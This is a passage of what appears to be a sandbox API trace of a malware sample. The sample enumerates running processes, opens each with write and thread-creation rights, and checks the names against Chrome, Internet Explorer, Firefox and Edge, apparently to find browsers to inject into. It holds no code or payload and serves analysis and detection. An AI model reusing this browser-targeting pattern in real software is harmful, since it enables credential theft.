	[0242.157] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.158] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x250) returned 0x8850
	[0242.158] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.158] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.159] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.159] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.160] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.160] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.160] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.161] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.162] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0x8854
	[0242.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.162] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.162] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.162] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.163] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.163] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.163] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.164] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.165] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0x8858
	[0242.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.165] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.165] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.166] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.166] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.166] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.166] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.167] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.168] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0x885c
	[0242.168] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.168] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.169] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.169] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.169] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.170] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.170] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.170] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.171] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0x8860
	[0242.171] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.171] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.172] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.172] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.172] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.173] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.173] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.173] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.174] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0x8864
	[0242.174] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.174] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.190] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.190] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.190] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.191] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.191] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.191] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.192] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0x8868
	[0242.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.193] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.193] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.193] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.194] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.194] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.194] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.194] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0242.195] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0x886c
	[0242.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.196] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0242.196] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.196] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.197] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0242.197] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.197] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.197] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.198] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0x8870
	[0242.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.199] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.199] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.199] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.200] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.200] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.200] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.201] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0242.202] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0x8874
	[0242.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.202] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.202] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.202] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.203] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.203] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.203] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.204] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0242.205] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0x8878
	[0242.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.205] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0242.205] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.205] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.206] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.206] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0242.207] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.207] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.207] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0242.208] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0x887c
	[0242.208] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.208] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0242.209] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.209] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.210] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0242.210] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.211] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.211] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0242.213] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0x8880
	[0242.213] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.213] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0242.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.214] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.214] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.214] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0242.215] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.215] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.215] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0242.217] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0x8884
	[0242.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.218] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0242.218] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.218] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.219] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.219] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0242.220] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.220] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.221] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0242.223] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0x8888
	[0242.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.223] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0242.223] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.223] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.224] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0242.224] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.224] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.225] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0242.226] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0x888c
	[0242.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.226] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0242.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.226] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.226] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.226] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0242.227] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.227] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.227] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0242.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0242.228] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0242.228] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0x8890
	[0242.228] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.229] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0242.229] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.229] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.230] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0242.230] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.230] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.231] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0242.231] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0x8894
	[0242.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.232] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0242.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.232] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.232] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0242.232] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.232] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.233] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0242.233] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0x8898
	[0242.233] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.233] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0242.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.234] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.234] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0242.234] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.234] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.235] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0242.235] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0x889c
	[0242.235] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.236] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0242.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.236] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.236] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0242.236] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.237] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.237] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0242.238] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0x88a0
	[0242.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.238] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0242.238] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.238] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.239] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0242.239] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.239] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.240] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0242.240] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0x88a4
	[0242.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.241] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0242.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.241] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.241] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0242.241] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.241] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.242] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0242.242] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0x88a8
	[0242.242] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.242] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0242.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.243] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.243] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.243] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0242.244] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.244] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.244] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0242.245] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0x88ac
	[0242.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.245] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0242.245] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.245] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0242.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.246] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0242.246] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0242.246] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0242.247] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0242.247] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0x88b0
